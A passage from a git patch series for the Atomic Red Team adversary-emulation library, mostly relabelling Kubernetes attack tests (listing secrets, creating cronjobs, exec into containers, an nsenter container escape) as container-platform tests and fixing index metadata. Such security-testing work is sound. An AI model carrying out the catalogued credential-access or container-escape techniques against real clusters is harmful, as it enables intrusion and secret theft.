ed":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 271dc6af..4c294dc1 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -11,7 +11,7 @@ - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.007 Container API](../../T1552.007/T1552.007.md) - - Atomic Test #1: ListSecrets [macos, linux] + - Atomic Test #1: ListSecrets [containers] - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux] - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] @@ -247,8 +247,8 @@ - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) @@ -898,8 +898,8 @@ - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) @@ -1383,10 +1383,10 @@ - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1609 Container Administration Command](../../T1609/T1609.md) - - Atomic Test #1: ExecIntoContainer [linux, macos] + - Atomic Test #1: ExecIntoContainer [containers] - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 678b201a..3e905419 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -9,7 +9,7 @@ - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.007 Container API](../../T1552.007/T1552.007.md) - - Atomic Test #1: ListSecrets [macos, linux] + - Atomic Test #1: ListSecrets [containers] - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux] - [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) - Atomic Test #1: SSH Credential Stuffing From Linux [linux] @@ -103,8 +103,8 @@ - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] @@ -430,8 +430,8 @@ - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) @@ -648,10 +648,10 @@ - Atomic Test #1: At - Schedule a job [linux] - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1609 Container Administration Command](../../T1609/T1609.md) - - Atomic Test #1: ExecIntoContainer [linux, macos] + - Atomic Test #1: ExecIntoContainer [containers] - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3bf345c7..2f883795 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -552,8 +552,7 @@ credential-access: ' supported_platforms: - - macos - - linux + - containers input_arguments: namespace: description: K8s namespace to list @@ -631,7 +630,9 @@ credential-access: ' name: sh - cleanup_command: kubectl --context kind-atomic-cluster delete pod atomic-pod + cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod + +' T1056.004: technique: external_references: @@ -11009,8 +11010,7 @@ privilege-escalation: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -11036,8 +11036,7 @@ privilege-escalation: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -39314,8 +39313,7 @@ persistence: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -39341,8 +39339,7 @@ persistence: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -58052,8 +58049,7 @@ execution: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to use @@ -58143,8 +58139,7 @@ execution: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -58170,8 +58165,7 @@ execution: ' supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list diff --git a/atomics/T1053.007/T1053.007.md b/atomics/T1053.007/T1053.007.md index fc86bcbc..fcc3edfc 100644 --- a/atomics/T1053.007/T1053.007.md +++ b/atomics/T1053.007/T1053.007.md @@ -16,7 +16,7 @@ In Kubernetes, a CronJob may be used to schedule a Job that runs one or more con ## Atomic Test #1 - ListCronjobs Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. -**Supported Platforms:** Linux, macOS +**Supported Platforms:** Containers **auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd @@ -49,7 +49,7 @@ kubectl get cronjobs -n #{namespace} ## Atomic Test #2 - CreateCronjob Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. -**Supported Platforms:** Linux, macOS +**Supported Platforms:** Containers **auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 diff --git a/atomics/T1552.007/T1552.007.md b/atomics/T1552.007/T1552.007.md index 9bcf155c..568a9c41 100644 --- a/atomics/T1552.007/T1552.007.md +++ b/atomics/T1552.007/T1552.007.md @@ -16,7 +16,7 @@ An adversary may access the Docker API to collect logs that contain credentials ## Atomic Test #1 - ListSecrets A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. -**Supported Platforms:** macOS, Linux +**Supported Platforms:** Containers **auto_generated_guid:** 43c3a49d-d15c-45e6-b303-f6e177e44a9a diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md index e3aaf7bd..0a8d1989 100644 --- a/atomics/T1609/T1609.md +++ b/atomics/T1609/T1609.md @@ -14,7 +14,7 @@ In Docker, adversaries may specify an entrypoint during container deployment tha ## Atomic Test #1 - ExecIntoContainer Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. -**Supported Platforms:** Linux, macOS +**Supported Platforms:** Containers **auto_generated_guid:** d03bfcd3-ed87-49c8-8880-44bb772dea4b From f0bdf22da19e391d401aa34ba0595048f154657c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 16:57:49 +0000 Subject: [PATCH 28/29] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-Markdown/index.md | 2 +- atomics/Indexes/Indexes-Markdown/linux-index.md | 2 +- atomics/Indexes/index.yaml | 2 +- atomics/T1611/T1611.md | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 4c294dc1..7c3a516f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -274,7 +274,7 @@ - [T1546.014 Emond](../../T1546.014/T1546.014.md) - Atomic Test #1: Persistance with Event Monitor - emond [macos] - [T1611 Escape to Host](../../T1611/T1611.md) - - Atomic Test #1: Deploy container using nsenter container escape [linux] + - Atomic Test #1: Deploy container using nsenter container escape [containers] - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 3e905419..097dc518 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -118,7 +118,7 @@ - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - [T1611 Escape to Host](../../T1611/T1611.md) - - Atomic Test #1: Deploy container using nsenter container escape [linux] + - Atomic Test #1: Deploy container using nsenter container escape [containers] - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2f883795..5e234174 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -12433,7 +12433,7 @@ privilege-escalation: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ supported_platforms: - - linux + - containers dependency_executor_name: sh dependencies: - description: Verify docker is installed. diff --git a/atomics/T1611/T1611.md b/atomics/T1611/T1611.md index 910e11e7..7d43bccb 100644 --- a/atomics/T1611/T1611.md +++ b/atomics/T1611/T1611.md @@ -18,7 +18,7 @@ Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ -**Supported Platforms:** Linux +**Supported Platforms:** Containers **auto_generated_guid:** 0b2f9520-a17a-4671-9dba-3bd034099fff From eb84927b5fd62327ff1c127aeb7bb5acbc305a8f Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Tue, 27 Jul 2021 11:16:38 -0700 Subject: [PATCH 29/29] Update default.html (#1572) Update Slack URL --- docs/_layouts/default.html | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/_layouts/default.html b/docs/_layouts/default.html index 80f8ca1f..279d4546 100644 --- a/docs/_layouts/default.html +++ b/docs/_layouts/default.html @@ -31,7 +31,7 @@ APIs Related View on GitHub - Join on Slack + Join on Slack